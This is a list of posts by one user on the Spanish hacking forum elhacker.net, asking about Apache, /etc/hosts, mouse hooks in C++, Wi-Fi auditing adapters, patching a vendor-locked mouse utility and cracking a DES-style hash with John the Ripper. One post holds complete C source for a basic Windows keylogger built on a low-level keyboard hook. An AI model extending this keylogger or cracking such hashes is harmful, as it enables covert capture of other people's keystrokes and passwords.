elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1]
1  Comunicaciones / Redes / Duda Servidor Apache en: 5 Marzo 2015, 17:17 pm
Hola, tengo una duda. Es que tengo un servidor local apache, funciona bien, pero cuando un cliente quiere acceder por HTTPS la pagina no carga, entonces la duda es ¿se puede hacer que cuando un cliente mande la peticion HTTPS lo redirija a la version HTTP de apache? ¿se puede con IPTABLES?, alguna idea. Gracias
2  Sistemas Operativos / GNU/Linux / Ayuda con el archivo /etc/hosts en: 4 Marzo 2015, 21:36 pm
Hola, lo que necesito es que todo el trafico se redirija a 127.0.0.1, con el archivo /etc/hosts

he intentado de la siguiente manera:

Código:
127.0.0.1           *.*
127.0.0.1           *.*.*
127.0.0.1           *.*.*.*

pero no pasa nada, cómo tengo que hacer? ayuda
3  Programación / Programación C/C++ / Ayuda Ejemplo HOOK de Mouse en: 12 Mayo 2014, 01:03 am
Hola a todos necesito ayuda necesito un ejemplo de usar WM_RBUTTONDOWN, lo que quiero hacer es que cuando la aplicacion detecte un boton derecho del mouse  a los 60 milisegundos simule un click de raton.
4  Seguridad Informática / Hacking Wireless / ¿ cual de estos adaptadores es mejor para auditar? en: 11 Mayo 2014, 18:56 pm
Hola a todos, estoy por comprarme un adaptador wifi usb y no se cual escojer entre estos 3:


1) La Cazadora 2 con chipset Ralink RT3072 de 300 mb
http://www.3bumen.com/es/iproductos/ver/G2/52/cazadora_2_tarjeta_inalambrica_usb_de_alta_potencia_1_watt/




2) La Alfa AWUS036NHA
http://www.alfa.com.tw/products_show.php?pc=34&ps=20



3) TL-WN8200ND
http://www.tp-link.com/co/products/details/?model=TL-WN8200ND#spec



Quiero trastear un poco con el Wifislax y con el Kali Linux, y quisiera saber sus opiniones.
5  Programación / Programación C/C++ / ¿Cómo medir los milisegundos entre MouseDown y MouseUp? en: 30 Enero 2014, 23:31 pm
Hola a todos, alguien me puede ayudar a  crear un cierre para compartir dos variables, una para almacenar la hora de inicio y otra para el tiempo final, y luego en el evento mouseup, obtener la diferencia:
 
Lo que hay en esta pagina es justo lo que quiero hacer :http://jsbin.com/uneqo , para que me entiendan mejor hagan click rápidamente en el botón y luego dejen el botón unos segundos, pero no  quiero que capture el tiempo cuando lo aplicación tiene el foco.  ¿Alguna idea? gracias  :)
6  Programación / Ingeniería Inversa / Ayuda!!! ¿en este caso que se hace? en: 29 Enero 2014, 22:30 pm
Buenas a todos, les comento el problema existe un programa llamado Tt eSPORTS Button Response Tool pero este solo funciona con los ratones de la marca Tt eSPORTS y yo quiero hacer que funcione con cualquier tipo de mouse; Les explico como funciona el programa, cuando el programa detecta un mouse de Tt eSPORTS muestra el nombre del dispositivo en un ComboBox que tiene, y el programa funciona normalmente, pero cuando es otra marca de mouse el programa no funciona por que no detecta ningún mouse de la marca Tt eSPORTS.

He aprendido un poco con los tutoriales de pedro narvaja y otros, pero en este caso no se como se podría hacer lo que digo arriba, he buscado y buscado y nada, no encuentro información de esto y quisiera que me ayudaran.

Aqui les dejo el link del pograma :http://www.ttesports.com/files/Product_download/tt%20esports%20button%20response%20tool%200113.rar
7  Programación / Programación C/C++ / ¿Como detectar clicks en c++ con intervalo de tiempo? en: 28 Enero 2014, 17:06 pm
Hola a todos, bueno estoy haciendo una aplicación para la cual necesito hacer que la aplicación detecte  cuando se clickea rápidamente; No se si me explico lo que quiero hacer es que la aplicación detecte que cuando uno haga por ejemplo uno haga 5 clicks en un intervalo de 0.9 segundos (por ejemplo) se ejecute una acción, espero que me puedan ayudar.  :D
8  Programación / Programación C/C++ / Ayuda con este Keylogger en: 1 Marzo 2013, 22:33 pm
Buenas, estoy iniciandome en esto de la programacion y he hecho mi propio keylogger y quisiera que me mostrara el proceso en donde fue escrito.Por ejemplo el keylogger capturo algo en el block de notas entonces quisiera que el keyloger me mostrara lo que capturo y en que proceso y hora.Muchas gracias y espero que me puedan ayudar. ;-)

Este es el codigo:
Código:
#include <windows.h>

//GLOBAL VARIABLES
HANDLE myConsoleHandle;
char log[1024] = {0};

//PROTOTYPES
LRESULT CALLBACK keyHandler(int nCode, WPARAM wParam, LPARAM lParam);


int WINAPI WinMain (HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nFunsterStil)

{
    //DECLARATIONs
    MSG message;
    HHOOK hookHandle;
    
    //MAKE CONSOLE
    AllocConsole();
    myConsoleHandle = GetStdHandle(STD_OUTPUT_HANDLE);
    
    //INSTALL HOOK
    hookHandle = SetWindowsHookEx(WH_KEYBOARD_LL, keyHandler, hThisInstance, 0);
    //MESSAGE LOOP
    while(GetMessage(&message, NULL, 0, 0) != 0) {
    TranslateMessage( &message );
    DispatchMessage( &message );
    }
    
    return 0;
}

//CALLBACK FUNCTION
LRESULT CALLBACK keyHandler(int nCode, WPARAM wParam, LPARAM lParam) {
    //DECLARATION
    DWORD cCharsWritten;

    if(nCode == HC_ACTION && wParam == WM_KEYDOWN){
        int keycode = ((KBDLLHOOKSTRUCT *)lParam)->vkCode;
        if(strlen(log) >=100) {
                       int cnt =  strlen(log);
                       for (int i=0; i<=cnt; i++){
                           log[i] = '\x00';
                           }
                           }
        log[strlen(log)] = (char)keycode;
        WriteConsole(myConsoleHandle, log, strlen(log), &cCharsWritten, NULL);
        WriteConsole(myConsoleHandle, "\n", 1, &cCharsWritten, NULL);
    }

    return CallNextHookEx(NULL, nCode, wParam, lParam);
}
9  Programación / Ingeniería Inversa / Alguien me puede decir como descifrar esto en: 30 Noviembre 2012, 02:08 am
Hola gente

Queria saber si alguien me puede ayudar a descifrar esto "oHSl3yqR.t1uQ".La verdad no se que tipo de cifrado sea, algunos me han dicho que john the ripper pero no se como hacerlo.

PD: si saben como hacerlo con john the ripper me podrian dejar como se hace porfa

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines